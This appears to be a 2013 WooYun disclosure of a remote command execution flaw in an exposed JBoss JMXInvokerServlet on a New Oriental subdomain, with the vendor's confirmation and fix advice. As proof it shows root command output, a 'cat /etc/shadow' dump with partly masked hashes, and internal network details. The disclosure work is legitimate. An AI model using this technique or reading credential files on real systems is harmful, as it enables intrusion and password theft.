当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042108

漏洞标题:新东方某分站任意命令执行漏洞 (已证明可内网渗透)

相关厂商:新东方

漏洞作者: 猪猪侠

提交时间:2013-11-06 10:34

修复时间:2013-12-21 10:34

公开时间:2013-12-21 10:34

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-06: 细节已通知厂商并且等待厂商处理中
2013-11-06: 厂商已经确认,细节仅向厂商公开
2013-11-16: 细节向核心白帽子及相关领域专家公开
2013-11-26: 细节向普通白帽子公开
2013-12-06: 细节向实习白帽子公开
2013-12-21: 细节向公众公开

简要描述:

测试发现新东方某分站存在严重命令执行风险,可直接内网渗透

详细说明:

# 问题描述
网站:http://400.xdf.cn/
Jboss的invoker/JMXInvokerServlet接口未做处理,导致可直接远程命令执行,危害和以前报告的 WooYun: 新东方某分站任意命令执行漏洞 (内网渗透危害较大请尽快修复) 差不多。
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE 远程部署漏洞。
http://www.exploit-db.com/exploits/28713/

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
Set-Cookie: JSESSIONID=59F063BFB81065333461B9282E80F72B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 28
Date: Wed, 06 Nov 2013 02:20:36 GMT
Connection: close
uid=0(root) gid=0(root)

漏洞证明:

# 漏洞证明,在内网
cat /etc/shadow

root:$1$vIHoh5FZ$N/ET.***************:15524:0:99999:7:::
bin:*:12088:0:99999:7:::
daemon:*:12088:0:99999:7:::
adm:*:12088:0:99999:7:::
lp:*:12088:0:99999:7:::
sync:*:12088:0:99999:7:::
shutdown:*:12088:0:99999:7:::
halt:*:12088:0:99999:7:::
mail:*:12088:0:99999:7:::
news:*:12088:0:99999:7:::
uucp:*:12088:0:99999:7:::
operator:*:12088:0:99999:7:::
games:*:12088:0:99999:7:::
gopher:*:12088:0:99999:7:::
ftp:*:12088:0:99999:7:::
nobody:*:12088:0:99999:7:::
rpm:!!:12088:0:99999:7:::
apache:!!:12088:0:99999:7:::
mailnull:!!:12088:0:99999:7:::
smmsp:!!:12088:0:99999:7:::
distcache:!!:12088:0:99999:7:::
ntp:!!:12088:0:99999:7:::
nscd:!!:12088:0:99999:7:::
vcsa:!!:12088:0:99999:7:::
rpc:!!:12088:0:99999:7:::
rpcuser:!!:12088:0:99999:7:::
nfsnobody:!!:12088:0:99999:7:::
sshd:!!:12088:0:99999:7:::
postgres:!!:12088:0:99999:7:::
webalizer:!!:12088:0:99999:7:::
dovecot:!!:12088:0:99999:7:::
squid:!!:12088:0:99999:7:::
mysql:!!:12088:0:99999:7:::
pcap:!!:12088:0:99999:7:::
xfs:!!:12088:0:99999:7:::
dbus:!!:12088:0:99999:7:::
haldaemon:!!:12088:0:99999:7:::
avahi:!!:12088:0:99999:7:::
named:!!:12088:0:99999:7:::
gdm:!!:12088:0:99999:7:::
sabayon:!!:12088:0:99999:7:::
ADMIN:$1$ZbDyElMt$***************/:15524:0:99999:7:::
admin:$1$Z0yJnxXC$***************.:15004:0:99999:7:::
supervisor:$1$HOoFI6v6$***************/:15014:0:99999:7:::


eth0      Link encap:Ethernet  HWaddr 00:50:56:8B:1E:04  
inet addr:192.168.1.241 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe8b:1e04/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15467918 errors:0 dropped:0 overruns:0 frame:0
TX packets:1374849 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6496067548 (6.0 GiB) TX bytes:906297121 (864.3 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:483696 errors:0 dropped:0 overruns:0 frame:0
TX packets:483696 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:465752892 (444.1 MiB) TX bytes:465752892 (444.1 MiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

修复方案:

# 删除接口
# 设置中间件的访问控制权限,禁止web访问 /invoker 目录

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-06 11:06

厂商回复:

谢谢提供消息,我们会尽快修复。

最新状态:

暂无